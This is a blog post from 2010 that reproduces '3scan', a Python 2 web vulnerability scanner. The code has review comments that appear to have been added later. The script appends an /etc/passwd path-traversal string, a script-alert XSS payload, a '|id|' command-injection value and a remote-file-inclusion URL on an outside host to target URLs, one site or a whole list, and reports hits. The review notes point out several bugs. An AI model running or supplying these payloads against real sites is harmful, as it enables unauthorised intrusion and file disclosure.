Thursday, November 25, 2010

3scan ( lfi-xss-rfi-cmd)

[code]

#!/usr/bin/python

#Checks for LFI, XSS, RFI and CMD injection by searching the page source and HTTP response (simple)


#http://www.darkc0de.com

#d3hydr8[at]gmail[dot]com


import sys, httplib, urllib2, re


# Probe strings appended to the target URL by the checks below.
# Don't change LFI, XSS, or CMD: each one is paired with a literal that its
# check searches for in the response ("root:", "XSS" and "uid=").
# Every probe is a fixed literal, so requests sent by this script are easy to
# match in web-server access logs or WAF rules.

# Run of "../" segments ending in etc/passwd; lfi() looks for "root:" in the reply.
LFI = "../../../../../../../../../../../../etc/passwd"

# URL of a text file on an external host; rfi() appends it to the target URL.
# NOTE(review): a hit means the tested application fetched content from this
# third-party host -- presumably not one the tester controls, so what it serves
# can change at any time. Confirm before relying on it.
RFI = "http://yozurino.com/r.txt?"

# NOTE(review): not read anywhere in this listing; rfi() hard-codes "Target".
RFI_TITLE = "Target"

# Percent-encoded form of "<script>alert('XSS')</script>; xss() looks for "XSS".
XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"

# The id command wrapped in pipes; cmd() looks for "uid=" in the reply.
CMD = "|id|"


def main(host):
   """Run the XSS, LFI, RFI and CMD checks, in that order, against one target.

   host is a URL prefix that has to end in "=" (a query parameter waiting for
   a value). Every "http://" substring is removed from it first; the checks
   then put "http://" back in front, so all requests go out over plain HTTP.

   A target that does not end in "=" is printed and the process exits with
   status 1. urllib2.HTTPError and urllib2.URLError raised by a check are
   printed and end the remaining checks for this target; any other exception
   propagates to the caller.
   """
   host = host.replace("http://","")
   if not host.endswith("="):
      print "\n[-] Host should end with a \'=\'\n"
      print "[-]",host
      sys.exit(1)

   print "\n[+] Host:",host

   # The loop sits inside the try, so the first check that raises one of the
   # two handled errors also skips every check listed after it.
   checks = (("XSS", xss), ("LFI", lfi), ("RFI", rfi), ("CMD", cmd))
   try:
      for label, probe in checks:
         print "\n[+] Checking " + label
         probe(host)
   except(urllib2.HTTPError, urllib2.URLError), msg:
      print "[-] Error Occurred:",msg



def rfi(host):
   """Request host with the RFI URL appended and report a hit on a marker match.

   The target is requested twice: once through httplib to read the status
   line, and once through urllib2 to read the body. A hit is printed when the
   body contains "Target" and the httplib status is 200.
   """


   try:

      # rsplit("/") has no maxsplit, so it splits on every "/": [0] is the
      # host name and [1] is only the first path segment.
      # NOTE(review): a target with more than one path segment is requested
      # with a shortened path here, and a target with no "/" raises
      # IndexError, which neither this function nor main() handles.
      h = httplib.HTTP(host.rsplit("/")[0])

      h.putrequest("GET","/"+host.rsplit("/")[1]+RFI)

      h.putheader("Host", host.rsplit("/")[0])

      h.endheaders()

      # headers is unpacked but not used afterwards.
      status, reason, headers = h.getreply()

      # Second request for the same target, this time with the full path.
      source = urllib2.urlopen("http://"+host+RFI).read()

      # NOTE(review): the marker is the hard-coded "Target", not RFI_TITLE, so
      # editing RFI_TITLE has no effect. The match is a plain substring
      # search, so a page that contains "Target" for any other reason is
      # reported as a hit.
      if re.search("Target", source) and status == 200:

         print "[+] RFI:",host+RFI,"\n[+]",status, reason

      else:

         print "[-] Not Vuln."

   # The empty tuple names no exception classes, so this handler never runs:
   # every exception raised above propagates to the caller.
   except(),msg:

      #print "[-] Error Occurred",msg

      pass


def xss(host):
   """Request host with the XSS marker appended and report whether it comes back.

   A hit is printed when the literal "XSS" occurs anywhere in the response
   body. Errors raised by urllib2 are not handled here and reach the caller.

   NOTE(review): this is a substring search only. A page that contains "XSS"
   for any other reason, or that echoes the parameter safely encoded, is also
   reported, so a hit does not show that the script would run in a browser.
   """
   body = urllib2.urlopen("http://" + host + XSS).read()
   if re.search("XSS", body) is None:
      print "[-] Not Vuln."
      return
   print "[!] XSS:",host+XSS


def cmd(host):
   """Request host with the CMD probe appended and report a match on "uid=".

   A hit is printed when "uid=" occurs anywhere in the response body. Errors
   raised by urllib2 are not handled here and reach the caller.

   NOTE(review): this is a substring search only. A page that contains "uid="
   for an unrelated reason (for instance inside a link) is reported as a hit,
   so a match needs manual confirmation.
   """
   body = urllib2.urlopen("http://" + host + CMD).read()
   if re.search("uid=", body) is None:
      print "[-] Not Vuln."
      return
   print "[!] CMD:",host+CMD


def lfi(host):
   """Request host with the LFI path appended, twice, and report "root:" matches.

   Each pass prints a hit when "root:" occurs anywhere in the response body,
   otherwise its own "not vulnerable" line. Errors raised by urllib2 are not
   handled here and reach the caller.

   NOTE(review): the second pass is labelled as a null-byte variant, but the
   suffix shown in this listing is an empty string (possibly lost when the
   page was published), so as written it repeats the first request. The match
   is a plain substring search, so any page containing "root:" is reported.
   """
   passes = (
      ("", "[-] Not Vuln."),
      ("", "[-] Not Vuln. w/  Null Byte"),
   )
   for suffix, miss_line in passes:
      target = host + LFI + suffix
      body = urllib2.urlopen("http://" + target).read()
      if re.search("root:", body) is None:
         print miss_line
      else:
         print "[!] LFI:",target


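# Command-line entry: exactly two arguments are expected, an option and its value.
if len(sys.argv) != 3:
   print "\nUsage: ./3scan.py "
   print "ex: ./3scan.py -s www.example.com/index.php?page="
   print "ex: ./3scan.py -list /home/d3hydr8/sites.txt"
   print "\t[options]"
   print "\t   -s/-site  : Searches just that site"
   print "\t   -l/-list  : Searches list"
   sys.exit(1)

print "\n   d3hydr8[at]gmail[dot]com 3scan v1.0"
print "---------------------------------------"

# -l/-list reads one target per line from a file. Any other option value falls
# through to the single-site branch; the -s/-site spelling is never checked.
# (The stray "{" and "}" that the published listing had around this condition
# made it a syntax error and are removed here.)
if sys.argv[1].lower() in ("-l", "-list"):
   try:
      sites = open(sys.argv[2], "r").readlines()
   except(IOError):
      print "Error: Check your file path\n"
      sys.exit(1)
   # NOTE(review): main() calls sys.exit(1) for an entry that does not end in
   # "=", so one malformed or blank line in the file ends the whole run.
   for host in sites:
      main(host.replace("\n",""))
else:
   main(sys.argv[2])

print "\n[+] Done\n"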

[/code]
